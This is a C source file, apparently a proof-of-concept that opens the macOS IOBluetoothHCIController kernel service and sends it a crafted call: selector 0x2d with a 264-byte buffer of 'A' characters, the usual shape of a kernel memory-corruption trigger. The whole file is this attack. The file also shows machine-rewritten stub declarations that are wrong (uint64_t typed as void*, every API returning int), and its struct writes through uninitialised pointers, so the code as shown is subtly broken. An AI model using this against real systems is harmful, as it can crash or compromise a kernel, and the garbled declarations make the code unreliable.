
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef void* uint64_t ;
typedef int uint32_t ;
struct BluetoothCall {int* sizes; int index; void** args; } ;
typedef int mach_port_t ;
typedef int kern_return_t ;
typedef int io_service_t ;
typedef int io_connect_t ;
typedef int a ;


 int IOConnectCallMethod (int ,int ,int *,int ,void const*,int,int *,int *,int *,int *) ;
 int IOObjectRelease (int ) ;
 int IOServiceClose (int) ;
 int IOServiceGetMatchingService (int ,int ) ;
 int IOServiceMatching (char*) ;
 int IOServiceOpen (int ,int ,int ,int*) ;
 scalar_t__ calloc (int,int) ;
 int fflush (int ) ;
 int kIOMasterPortDefault ;
 int kIOReturnSuccess ;
 int mach_task_self () ;
 int memset (void*,char,int) ;
 int printf (char*,...) ;
 int stdout ;

int main(void) {

  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
    IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }


  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;

  a.sizes[0] = 0x1000;
  a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));


  a.sizes[1] = 264;
  a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
  memset((void *)a.args[1], 'A', a.sizes[1]);


  a.index = 0x2d;


  for(int i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
  fflush(stdout);

  kr = IOConnectCallMethod((mach_port_t) port,
      (uint32_t) 0,
      ((void*)0), 0,
      (const void*) &a,
      sizeof(a),
      ((void*)0), ((void*)0), ((void*)0), ((void*)0));
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
